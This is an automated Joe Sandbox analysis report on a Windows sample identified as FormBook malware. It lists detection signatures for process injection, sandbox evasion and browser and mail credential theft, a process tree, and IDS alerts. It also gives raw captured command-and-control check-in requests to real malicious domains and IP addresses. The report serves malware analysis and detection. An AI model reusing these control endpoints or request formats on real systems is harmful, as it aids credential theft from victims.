Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561747
MD5:df31a2ccd06e0f1075f7280d156f5237
SHA1:d2583bb274455234c26d299931edf04537bc76ef
SHA256:2e64ed10f0c61a872dbc4cc8ac023e947db0c9642044dbe33af671cff97135a0
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DF31A2CCD06E0F1075F7280D156F5237)
    • file.exe (PID: 8148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DF31A2CCD06E0F1075F7280D156F5237)
      • QmkRHPDwxbW.exe (PID: 5988 cmdline: "C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 6712 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • QmkRHPDwxbW.exe (PID: 4764 cmdline: "C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.file.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.file.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:21:48.178527+010028554651A Network Trojan was detected192.168.2.104978674.48.143.8280TCP
                2024-11-24T08:22:13.321614+010028554651A Network Trojan was detected192.168.2.104984698.124.224.1780TCP
                2024-11-24T08:22:28.903617+010028554651A Network Trojan was detected192.168.2.1049885103.21.221.480TCP
                2024-11-24T08:22:44.325497+010028554651A Network Trojan was detected192.168.2.1049923154.23.184.9580TCP
                2024-11-24T08:22:59.499518+010028554651A Network Trojan was detected192.168.2.104995988.198.8.15080TCP
                2024-11-24T08:23:14.280858+010028554651A Network Trojan was detected192.168.2.1049993172.67.162.3980TCP
                2024-11-24T08:23:49.750491+010028554651A Network Trojan was detected192.168.2.105000546.253.5.22180TCP
                2024-11-24T08:24:04.614948+010028554651A Network Trojan was detected192.168.2.1050009107.167.84.4280TCP
                2024-11-24T08:24:19.667229+010028554651A Network Trojan was detected192.168.2.1050013209.74.77.10980TCP
                2024-11-24T08:24:34.685232+010028554651A Network Trojan was detected192.168.2.1050017199.59.243.22780TCP
                2024-11-24T08:24:50.033643+010028554651A Network Trojan was detected192.168.2.105002174.208.236.15680TCP
                2024-11-24T08:25:05.179600+010028554651A Network Trojan was detected192.168.2.105002568.66.226.9280TCP
                2024-11-24T08:25:20.159714+010028554651A Network Trojan was detected192.168.2.1050029172.67.186.19280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:22:05.420659+010028554641A Network Trojan was detected192.168.2.104982798.124.224.1780TCP
                2024-11-24T08:22:08.089249+010028554641A Network Trojan was detected192.168.2.104983398.124.224.1780TCP
                2024-11-24T08:22:10.819509+010028554641A Network Trojan was detected192.168.2.104983998.124.224.1780TCP
                2024-11-24T08:22:20.816133+010028554641A Network Trojan was detected192.168.2.1049862103.21.221.480TCP
                2024-11-24T08:22:23.488075+010028554641A Network Trojan was detected192.168.2.1049870103.21.221.480TCP
                2024-11-24T08:22:26.144464+010028554641A Network Trojan was detected192.168.2.1049878103.21.221.480TCP
                2024-11-24T08:22:36.284996+010028554641A Network Trojan was detected192.168.2.1049901154.23.184.9580TCP
                2024-11-24T08:22:38.941250+010028554641A Network Trojan was detected192.168.2.1049909154.23.184.9580TCP
                2024-11-24T08:22:41.613298+010028554641A Network Trojan was detected192.168.2.1049915154.23.184.9580TCP
                2024-11-24T08:22:51.531098+010028554641A Network Trojan was detected192.168.2.104993988.198.8.15080TCP
                2024-11-24T08:22:54.225589+010028554641A Network Trojan was detected192.168.2.104994588.198.8.15080TCP
                2024-11-24T08:22:56.965486+010028554641A Network Trojan was detected192.168.2.104995288.198.8.15080TCP
                2024-11-24T08:23:06.308685+010028554641A Network Trojan was detected192.168.2.1049976172.67.162.3980TCP
                2024-11-24T08:23:08.933021+010028554641A Network Trojan was detected192.168.2.1049981172.67.162.3980TCP
                2024-11-24T08:23:11.660360+010028554641A Network Trojan was detected192.168.2.1049988172.67.162.3980TCP
                2024-11-24T08:23:21.347639+010028554641A Network Trojan was detected192.168.2.105000246.253.5.22180TCP
                2024-11-24T08:23:24.019480+010028554641A Network Trojan was detected192.168.2.105000346.253.5.22180TCP
                2024-11-24T08:23:26.691300+010028554641A Network Trojan was detected192.168.2.105000446.253.5.22180TCP
                2024-11-24T08:23:56.661867+010028554641A Network Trojan was detected192.168.2.1050006107.167.84.4280TCP
                2024-11-24T08:23:59.293030+010028554641A Network Trojan was detected192.168.2.1050007107.167.84.4280TCP
                2024-11-24T08:24:01.939771+010028554641A Network Trojan was detected192.168.2.1050008107.167.84.4280TCP
                2024-11-24T08:24:11.589441+010028554641A Network Trojan was detected192.168.2.1050010209.74.77.10980TCP
                2024-11-24T08:24:14.320981+010028554641A Network Trojan was detected192.168.2.1050011209.74.77.10980TCP
                2024-11-24T08:24:16.977103+010028554641A Network Trojan was detected192.168.2.1050012209.74.77.10980TCP
                2024-11-24T08:24:26.656912+010028554641A Network Trojan was detected192.168.2.1050014199.59.243.22780TCP
                2024-11-24T08:24:29.332179+010028554641A Network Trojan was detected192.168.2.1050015199.59.243.22780TCP
                2024-11-24T08:24:31.942671+010028554641A Network Trojan was detected192.168.2.1050016199.59.243.22780TCP
                2024-11-24T08:24:41.562922+010028554641A Network Trojan was detected192.168.2.105001874.208.236.15680TCP
                2024-11-24T08:24:44.480619+010028554641A Network Trojan was detected192.168.2.105001974.208.236.15680TCP
                2024-11-24T08:24:47.408255+010028554641A Network Trojan was detected192.168.2.105002074.208.236.15680TCP
                2024-11-24T08:24:57.221884+010028554641A Network Trojan was detected192.168.2.105002268.66.226.9280TCP
                2024-11-24T08:24:59.881848+010028554641A Network Trojan was detected192.168.2.105002368.66.226.9280TCP
                2024-11-24T08:25:02.505834+010028554641A Network Trojan was detected192.168.2.105002468.66.226.9280TCP
                2024-11-24T08:25:11.993303+010028554641A Network Trojan was detected192.168.2.1050026172.67.186.19280TCP
                2024-11-24T08:25:14.749889+010028554641A Network Trojan was detected192.168.2.1050027172.67.186.19280TCP
                2024-11-24T08:25:17.470725+010028554641A Network Trojan was detected192.168.2.1050028172.67.186.19280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 68%
                Source: file.exeVirustotal: Detection: 37%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QmkRHPDwxbW.exe, 00000005.00000002.3753745790.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3750502958.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0241C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0241C8D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax7_2_02409E40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h7_2_02E604D8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49786 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49827 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49833 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49839 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49846 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49862 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49870 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49878 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49901 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49885 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49909 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49915 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49923 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49939 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49945 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49952 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49959 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49993 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50005 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50004 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50012 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50008 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50013 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50021 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50024 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50026 -> 172.67.186.192:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50017 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50022 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50016 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50023 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50025 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50027 -> 172.67.186.192:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50018 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50019 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50020 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50028 -> 172.67.186.192:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50009 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50029 -> 172.67.186.192:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.izmirescortg.xyz
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Joe Sandbox ViewIP Address: 154.23.184.95 154.23.184.95
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /p8wp/?GX6Lp2F=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnjhE6i9YZvkkiI4bTXFL7F6jfGLzFg==&H8=BpFD-28hKhrD HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /47f1/?GX6Lp2F=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8FZPnmItglef8oIfH3xEPH5Gk5cdjw==&H8=BpFD-28hKhrD HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4iun/?GX6Lp2F=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpudeeEuZLaZHAlqHDud2TkhyZZeYQxg==&H8=BpFD-28hKhrD HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /lazq/?GX6Lp2F=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVSnofUD39ICOc0FIB5gcPzcC3Y1kKg==&H8=BpFD-28hKhrD HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /2lci/?GX6Lp2F=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNFSbRcaQ2LBAWGtnFx6vVohs8RPjrA==&H8=BpFD-28hKhrD HTTP/1.1Host: www.snehasfashion.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /s7xt/?GX6Lp2F=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9U5k7peL8+9qmxBtq+TRLy+e1vGRqg==&H8=BpFD-28hKhrD HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /gybb/?H8=BpFD-28hKhrD&GX6Lp2F=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4PgAZipsqs/kn6LZvixDWxXnWnZkIg== HTTP/1.1Host: www.windsky.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rjvg/?GX6Lp2F=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MhCYnHJ28VWxL0fj0Y8TMYCyxad2qg==&H8=BpFD-28hKhrD HTTP/1.1Host: www.cssa.auctionAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4r26/?H8=BpFD-28hKhrD&GX6Lp2F=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80eqplMgmGVUTbCPRmhwbXi4X3f8N+iA== HTTP/1.1Host: www.moviebuff.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rfcw/?GX6Lp2F=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg88l2Cxg6VY9qmpf/gPts30TBLrJ7Cw==&H8=BpFD-28hKhrD HTTP/1.1Host: www.whisperart.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
